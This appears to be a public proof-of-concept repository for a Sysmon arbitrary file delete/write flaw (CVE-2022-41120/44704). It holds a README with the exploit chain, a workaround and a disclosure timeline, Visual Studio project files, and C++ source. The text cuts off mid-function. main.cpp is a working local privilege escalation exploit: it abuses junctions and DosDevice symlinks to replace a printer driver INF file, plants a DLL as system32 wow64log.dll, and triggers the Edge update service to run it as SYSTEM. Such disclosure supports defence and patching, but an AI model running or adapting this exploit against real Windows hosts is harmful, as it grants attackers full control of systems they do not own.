[
  {
    "path": "README.md",
    "content": "# SysmonEoP\n\nProof of Concept for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-44704)\n\n# Vulnerability\n\nVulnerability is in code responsible for ClipboardChange event that can be reached through RPC. \nLocal users can send data to RPC server which will then be written in C:\\Sysmon directory (default ArchiveDirectory) and deleted afterwards.\nIn version before 14.11 Sysmon would not check if directory was created by low privilege user or if it's a junction which can be abused to perform arbitrary file delete/write (kinda limited as you can only write strings) in context of NT AUTHORITY\\SYSTEM user.\nIn version 14.11/14.12, after initial fix, Sysmon would check if directory exists and would refuse to write/delete files if directory exists.\nThis patch was bypassed by letting Sysmon create C:\\Sysmon directory first (using CreateDirectory API) and opening handle on it before SetFileSecurity is called and change DACL's on C:\\Sysmon directory.\n\n# Exploitation\n\nAll testing was done on Windows 10.\n\nIn my PoC I have chained arbitrary file delete/write to first delete setup information file of printer driver and then write modified .INF file (as spooler service is enabled by default and low privilege users can re-install printer drivers on windows clients).\nSetup information files can be abused to perform all kind of operations such service creation, registry modification, file copy etc.\nI choose to copy some of printer default DLL's in c:\\windows\\system32 and set permissions on it so that low privilege users can modify it, this is done using CopyFiles directive (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/inf-copyfiles-directive). Once file is copied it is overwritten with DLL that will spawn elevated cmd.exe process.\nIt is possible to abuse just arbitrary file delete for LPE by abusing windows installer behavior (trick found by [@KLINIX5](https://twitter.com/KLINIX5) and is documented by ZDI here https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).\n\n# Vulnerable versions and pre-requirements\n\nAll testing was done on versions 13.34-14.12.\nI don’t know exactly lowest version that is vulnerable, but I believe that versions 12.0 - 14.12 are vulnerable as ClipboardChange event was introduced in version 12.0.\nIn order to exploit this vulnerability events that use ArchiveDirectory should not be enabled (ClipboardChange and FileDelete I believe) as if those two are used then ArchiveDirectory will be created and have secure permissions.\n\n# Workaround\n\nIf you are using vulnerable version and cannot update you can create ArchiveDirectory (C:\\Sysmon by default) and set permissions that will only allow access to NT AUTHORITY\\SYSTEM account.\n\n# Timeline\n\n- 2022/06/13 - Vulnerability reported to Microsoft\n- 2022/06/16 - Vulnerability confirmed.\n- 2022/11/08 - Patch and CVE released.\n- 2022/11/08 - Bypass reported to Microsoft.\n- 2022/11/11 - Microsoft cannot reproduce vulnerability, asks for different PoC.\n- 2022/11/11 - I send same PoC and suggest that sysmon is either not installed on testing VM or installation was corrupted.\n- 2022/11/15 - Microsoft confirmed bypass.\n- 2022/11/28 - Microsoft release v14.13 that patched vulnerabilty (CVE will be released in December Patch Tuesday)\n\n# Links & Resources\n- https://itm4n.github.io/fuzzing-windows-rpc-rpcview/\n- https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks\n"
  },
  {
    "path": "v1/README.md",
    "content": "Exploit for verions before 14.11.\n\n![PoC](poc.PNG)\n"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30717.126\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SysmonEOP\", \"SysmonEOP.vcxproj\", \"{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>\r\n    <RootNamespace>SysmonEOP</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <ProgramDataBaseFileName />\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n    <BuildLog>\r\n      <Path />\r\n    </BuildLog>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n    <ClCompile Include=\"sysmon_c.c\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\" />\r\n    <ClInclude Include=\"resource.h\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"sysmon_c.c\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\">\r\n      <Filter>Source Files</Filter>\r\n    </Midl>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"resource.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\">\r\n      <Filter>Resource Files</Filter>\r\n    </ResourceCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/def.h",
    "content": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include <Wbemidl.h>\r\n#include \"sysmon_h.h\"\r\n#include \"resource.h\"\r\n\r\n\r\n#pragma comment(lib, \"wbemuuid.lib\")\r\n#pragma comment(lib,\"RpcRT4.lib\")\r\n#pragma warning(disable:4996)\r\n\r\nstruct __declspec(uuid(\"A6B716CB-028B-404D-B72C-50E153DD68DA\")) CLSID_MSEdge_Object;\r\nclass __declspec(uuid(\"79e0c401-b7bc-4de5-8104-71350f3a9b67\")) IGoogleUpdate : IUnknown {\r\npublic:\r\n\r\n\r\n    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);\r\n    HRESULT Update(const WCHAR* guid, VOID* observer);\r\n\r\n};\r\n\r\n//Variables\r\nwchar_t object[] = L\"Global\\\\GLOBALROOT\\\\RPC Control\\\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A\";\r\nwchar_t sysmon[] = L\"C:\\\\SYSMON\";\r\nHANDLE hFile, hFile2,hSysmon;\r\n\r\n//Functions*\r\nLPWSTR Find();\r\nvoid load();\r\nBOOL AddPrinterDriverWmi();\r\nvoid Trigger(LPWSTR alpc);\r\nLPWSTR  BuildPath(LPCWSTR path);\r\nBOOL CreateJunction(HANDLE dir, LPCWSTR target);\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DeleteJunction(HANDLE dir);\r\n\r\n\r\ntypedef struct _REPARSE_DATA_BUFFER {\r\n    ULONG  ReparseTag;\r\n    USHORT ReparseDataLength;\r\n    USHORT Reserved;\r\n    union {\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            ULONG  Flags;\r\n            WCHAR  PathBuffer[1];\r\n        } SymbolicLinkReparseBuffer;\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            WCHAR  PathBuffer[1];\r\n        } MountPointReparseBuffer;\r\n        struct {\r\n            UCHAR DataBuffer[1];\r\n        } GenericReparseBuffer;\r\n    } DUMMYUNIONNAME;\r\n} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;\r\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\r\n    UNICODE_STRING Name;\r\n    UNICODE_STRING TypeName;\r\n} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;\r\n#define STATUS_MORE_ENTRIES 0x00000105\r\n#define STATUS_NO_MORE_ENTRIES 0x8000001A\r\n#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)\r\n\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);\r\ntypedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);\r\ntypedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);\r\n\r\n_RtlInitUnicodeString pRtlInitUnicodeString;\r\n_NtCreateFile pNtCreateFile;\r\n_NtSetInformationFile pNtSetInformationFile;\r\n_NtQueryDirectoryObject pNtQueryDirectoryObject;\r\n_NtOpenDirectoryObject pNtOpenDirectoryObect;"
  },
  {
    "path": "v1/SysmonEoP/main.cpp",
    "content": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n    load();\r\n    LPWSTR alpc = Find();\r\n    HANDLE h1;\r\n    if (alpc == NULL) {\r\n        printf(\"[!] Failed to find ALPC port!\\n\");\r\n        return 1;\r\n    }\r\n\r\n    if (!CreateDirectory(sysmon, NULL)) {\r\n        printf(\"[!] Failed to create %ls directory!\\n\",sysmon);\r\n        return 1;\r\n    }\r\n    hSysmon = CreateFile(sysmon, FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_DELETE_ON_CLOSE, NULL);\r\n    if (hSysmon == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] Failed to open handle on %ls directory!\\n\", sysmon);\r\n        return 1;\r\n    }\r\n    DosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    CreateJunction(hSysmon, L\"\\\\RPC Control\");\r\n   \r\n    Trigger(alpc);\r\n   \r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 != INVALID_HANDLE_VALUE);\r\n    Sleep(500);\r\n   \r\n    printf(\"[+] Driver setup info file deleted!\\n\");\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);\r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 == INVALID_HANDLE_VALUE);\r\n    HMODULE hm = GetModuleHandle(NULL);\r\n    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L\"dll\");\r\n    DWORD DllSize = SizeofResource(hm, res);\r\n    void* DllBuff = LoadResource(hm, res);\r\n    printf(\"[+] Driver setup info file written.\\n\");\r\n    if (!AddPrinterDriverWmi()) {\r\n        printf(\"[!] Failed to add print driver!\\n\");\r\n        return 1;\r\n    }\r\n   \r\n    HANDLE dll;\r\n    do {\r\n        Sleep(1000);\r\n        dll = CreateFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (dll == INVALID_HANDLE_VALUE);\r\n    printf(\"[+] DLL created!\\n\");\r\n    WriteFile(dll, DllBuff, DllSize, NULL, NULL);\r\n    CloseHandle(dll);\r\n    printf(\"[*] Triggering Edge Update service!\\n\");\r\n    HRESULT coini = CoInitialize(NULL);\r\n    IGoogleUpdate* updater = NULL;\r\n\r\n    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);\r\n    \r\n   \r\n    DelDosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    DeleteJunction(hSysmon);\r\n    while(!DeleteFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\")){}\r\n    return 0;\r\n}\r\n\r\n\r\n\r\nvoid load() {\r\n    HMODULE ntdll = LoadLibraryW(L\"ntdll.dll\");\r\n    if (ntdll != NULL) {\r\n        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, \"RtlInitUnicodeString\");\r\n        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, \"NtCreateFile\");\r\n        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, \"NtQueryDirectoryObject\");\r\n        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, \"NtOpenDirectoryObject\");\r\n        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n    }\r\n    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {\r\n        printf(\"Cannot load api's %d\\n\", GetLastError());\r\n        exit(0);\r\n    }\r\n\r\n}\r\n\r\n\r\n\r\nBOOL CreateJunction(HANDLE hDir, LPCWSTR target) {\r\n    HANDLE hJunction;\r\n    DWORD cb;\r\n    wchar_t printname[] = L\"\";\r\n    if (hDir == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);\r\n    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);\r\n    SIZE_T PathLen = TargetLen + PrintnameLen + 12;\r\n    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));\r\n    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);\r\n    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    Data->ReparseDataLength = PathLen;\r\n    Data->Reserved = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)\r\n    {\r\n\r\n        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls -> %ls created!\\n\", dir, target);\r\n        free(Data);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n\r\n        printf(\"[!] Error: %d. Exiting\\n\", GetLastError());\r\n        free(Data);\r\n        return FALSE;\r\n    }\r\n}\r\nBOOL DeleteJunction(HANDLE handle) {\r\n    REPARSE_GUID_DATA_BUFFER buffer = { 0 };\r\n    BOOL ret;\r\n    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    DWORD cb = 0;\r\n    IO_STATUS_BLOCK io;\r\n    if (handle == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {\r\n        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls deleted!\\n\", dir);\r\n        return TRUE;\r\n    }\r\n    else\r\n    {\r\n        printf(\"[!] Error: %d.\\n\", GetLastError());\r\n        return FALSE;\r\n    }\r\n}\r\n\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls created!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n    }\r\n}\r\n\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {\r\n        